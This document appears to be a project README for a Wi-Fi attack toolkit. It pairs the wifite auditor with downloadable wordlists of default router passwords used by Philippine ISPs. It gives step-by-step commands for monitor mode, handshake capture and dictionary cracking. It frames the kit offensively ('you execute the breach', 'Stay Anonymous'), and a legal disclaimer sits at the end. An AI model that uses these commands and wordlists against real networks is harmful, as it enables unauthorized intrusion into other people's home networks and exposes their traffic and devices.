Visualize Penetration. Automate Access.
Scanning... Targeting... Exploiting...
This toolkit integrates the powerful wifite
automated wireless auditor with a curated wordlist specifically targeting default router passwords commonly found in the Philippines (jcrvnx/PH-WIFI-WORDLISTS
). It's designed for Kali Linux but adaptable to any Linux distribution with the right hardware and dependencies.
We provide the framework; you execute the breach. This README includes setup instructions, usage patterns, and essential documentation for leveraging these tools effectively.
- 🎯 Targeted Attack: Utilizes a massive wordlist focused on PH ISP default credentials.
- ⚙️ Automated Auditing: Leverages
wifite
for scanning, target selection, and attack execution (WPS, WPA/WPA2 Handshake Capture & Cracking). - 🐧 Broad Linux Compatibility: Optimized for Kali Linux, but functional on Ubuntu, Debian, Arch, and other distros (dependencies required).
Mandatory on any Linux Distro:
-
Update & Upgrade System: Keep your attack platform sharp.
sudo apt update && sudo apt upgrade -y # Or use your distro's package manager (e.g., pacman, dnf)
-
Install Dependencies:
wifite
is essential.sudo apt install wifite -y # Ensure aircrack-ng suite, hashcat/john are also installed (usually come with Kali/wifite)
-
Wireless Adapter Check: Your WiFi card MUST support Monitor Mode and Packet Injection. Verify using:
sudo airmon-ng check kill # Kill interfering processes sudo airmon-ng start <your-wireless-interface> # e.g., wlan0 # Look for "(monitor mode enabled)" # If issues arise, consult Kali documentation for driver installation.
-
Download the WIFI wordlists: Each of these wordlists contains 10 million possible passwords.
https://www.mediafire.com/folder/8lq8574eud1r1/PH_WIFI_WORDLISTS
-
Navigate (Optional): You don't need to be in the wordlist directory to run
wifite
, but know the full path to the wordlist file you want to use. -
Launch Wifite with the Dictionary:
- Identify the specific wordlist file you want to use within the cloned
PH-WIFI-WORDLISTS
directory (e.g.,/home/orhen/Downloads/pldt.txt
,Passwords/converge.txt
, etc.). - Run
wifite
withsudo
(required for network operations) and point it to your chosen dictionary using the--dict
flag.
# Example using the PLDT common password list: # Replace '/path/to/PH-WIFI-WORDLISTS/' with the actual path where you cloned the repo. sudo wifite --dict /path/to/PH-WIFI-WORDLISTS/Passwords/PLDT-WIFI-PASSWORDS.txt # Example using a different list: # sudo wifite --dict /path/to/PH-WIFI-WORDLISTS/Passwords/SKY-WIFI-PASSWORDS.txt # To try ALL wordlists in sequence (less efficient, wifite might not support multiple dicts easily this way, better to run separately or combine lists): # Consider combining relevant lists into one large file first if needed. # cat /path/to/PH-WIFI-WORDLISTS/Passwords/*.txt > /path/to/combined_ph_list.txt # sudo wifite --dict /path/to/combined_ph_list.txt
- Identify the specific wordlist file you want to use within the cloned
-
Follow Wifite Prompts:
wifite
will scan for networks.- Press
Ctrl+C
when you see your target(s). - Select the target network number(s).
wifite
will attempt various attacks (WPS PIN, WPA Handshake Capture).- If a WPA handshake is captured,
wifite
will automatically use the specified dictionary (--dict
) to attempt cracking the password.
OPERATION SECURITY NOTICE:
- Unauthorized Access is ILLEGAL: Using this tool and wordlist against networks you do NOT own or have explicit written permission to test is a CRIMINAL OFFENSE in the Philippines (RA 10175 Cybercrime Prevention Act) and most other jurisdictions.
- Educational Purposes ONLY: This toolkit is provided strictly for educational learning and for auditing your OWN network security or networks where you have obtained explicit consent.
- NO RESPONSIBILITY: The creators and contributors of this guide,
wifite
, and thePH-WIFI-WORDLISTS
repository are NOT RESPONSIBLE for any illegal activities, misuse, or damage caused by these tools. - USE AT YOUR OWN EXTREME RISK: You are solely responsible for your actions. Understand the laws and ethical implications before proceeding. Think before you type.
Crack Wisely. Hack Wisely. Stay Anonymous.